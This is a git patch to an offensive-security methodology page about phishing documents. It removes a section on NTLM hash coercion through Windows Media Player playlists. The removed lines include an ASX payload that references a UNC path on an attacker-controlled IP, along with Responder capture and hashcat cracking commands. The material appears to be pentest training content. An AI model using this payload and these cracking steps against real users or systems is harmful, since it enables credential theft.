From 9a95bc80a3c87139a5eecd7fcca0ef2cd1276e1f Mon Sep 17 00:00:00 2001
From: SirBroccoli <carlospolop@gmail.com>
Date: Sun, 7 Sep 2025 23:21:49 +0200
Subject: [PATCH] Update phishing-documents.md

---
 .../phishing-documents.md                     | 34 +------------------
 1 file changed, 1 insertion(+), 33 deletions(-)

diff --git a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
index cb288e2fd..e08280215 100644
--- a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
+++ b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
@@ -160,38 +160,6 @@ There are several ways to **force NTLM authentication "remotely"**, for example,
 ../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md
 {{#endref}}
 
-### Windows Media Player playlists (.ASX/.WAX) to coerce NTLM
-
-If a workflow automatically previews media (e.g., HR reviewing uploads) using Windows Media Player, you can leak Net-NTLMv2 by providing a playlist that references a UNC path. When WMP loads the entry, it attempts SMB access with implicit NTLM authentication.
-
-Example ASX payload (also supported by .WAX):
-
-```xml
-<asx version="3.0">
-  <title>Leak</title>
-  <entry>
-    <title></title>
-    <ref href="file://10.10.14.148\test\pwn.mp3" />
-  </entry>
-</asx>
-```
-
-Collect and crack the hash:
-
-```bash
-# Capture Net-NTLMv2
-sudo Responder -I <iface>
-# Or run via uv if you manage dependencies with it
-# sudo uv run --script Responder.py -I <iface>
-
-# Crack (hashcat auto-detects NetNTLMv2, mode 5600)
-hashcat ntlm.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
-```
-
-Notes
-- Use ntlm_theft to generate ready-made WMP coercion files: https://github.com/Greenwolf/ntlm_theft
-- If NTLM signing/SMB egress is blocked or NTLM disabled, this won’t work. Otherwise, it’s effective when targets auto-open or preview uploaded playlists.
-
 ### NTLM Relay
 
 Don't forget that you cannot only steal the hash or the authentication but also **perform NTLM relay attacks**:
@@ -256,4 +224,4 @@ Hunting/IOCs
 - [ntlm_theft – NTLM coercion file generator](https://github.com/Greenwolf/ntlm_theft)
 - [Responder](https://github.com/lgandx/Responder)
 
-{{#include ../../banners/hacktricks-training.md}}
\ No newline at end of file
+{{#include ../../banners/hacktricks-training.md}}